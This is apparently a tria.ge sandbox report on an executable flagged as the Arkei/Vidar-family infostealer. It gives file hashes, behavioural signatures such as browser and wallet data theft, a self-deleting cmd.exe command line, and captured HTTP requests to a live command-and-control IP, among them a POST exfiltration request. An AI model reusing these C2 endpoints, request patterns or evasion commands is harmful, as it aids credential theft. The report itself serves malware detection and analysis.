Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

ac4e613023...2c.exe

windows7_x64

10

ac4e613023...2c.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    37s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07/07/2022, 15:10 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe

  • Size

    362KB

  • MD5

    0a0503dce0e780c82d119fa033577cfe

  • SHA1

    0e577608c1f0766c6d1e88f8a081fc58663517e8

  • SHA256

    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c

  • SHA512

    220674cdda4162e2130b96a40340966d78bb0962edcf0ec50bf0b9e210b5b8f25b4d4863ef6118c48614833dd10c4fbae7f305043f13d1c831040a02954bbbbe

Score
10/10
arkeidefaultdiscoveryspywarestealersuricata

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)

    suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)

    suricata
  • suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

    suricata
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    "C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe" & exit
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:1476

Network

  • flag-az
    GET
    http://46.23.109.160/jfdjc.php
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    GET /jfdjc.php HTTP/1.1
    Host: 46.23.109.160
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:08 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Set-Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 28
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-az
    GET
    http://46.23.109.160/request
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    GET /request HTTP/1.1
    Host: 46.23.109.160
    Cache-Control: no-cache
    Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:08 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Last-Modified: Mon, 21 Feb 2022 12:34:00 GMT
    ETag: "17e499-5d88672651e00"
    Accept-Ranges: bytes
    Content-Length: 1565849
  • flag-az
    POST
    http://46.23.109.160/jfdjc.php
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    POST /jfdjc.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS
    Host: 46.23.109.160
    Content-Length: 62169
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:11 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 0
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 46.23.109.160:80
    http://46.23.109.160/jfdjc.php
    http
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    95.5kB
     1.6MB
     720
    1214

    HTTP Request

    GET http://46.23.109.160/jfdjc.php

    HTTP Response

    200

    HTTP Request

    GET http://46.23.109.160/request

    HTTP Response

    200

    HTTP Request

    POST http://46.23.109.160/jfdjc.php

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • \ProgramData\mozglue.dll
    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

    Download Submit

  • \ProgramData\nss3.dll
    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

    Download Submit

  • memory/1972-57-0x0000000075F21000-0x0000000075F23000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1972-59-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1972-60-0x0000000060900000-0x0000000060992000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1972-58-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB

    Download

  • memory/1972-55-0x0000000000230000-0x0000000000259000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1972-56-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1972-82-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB

    Download

  • memory/1972-83-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1972-54-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.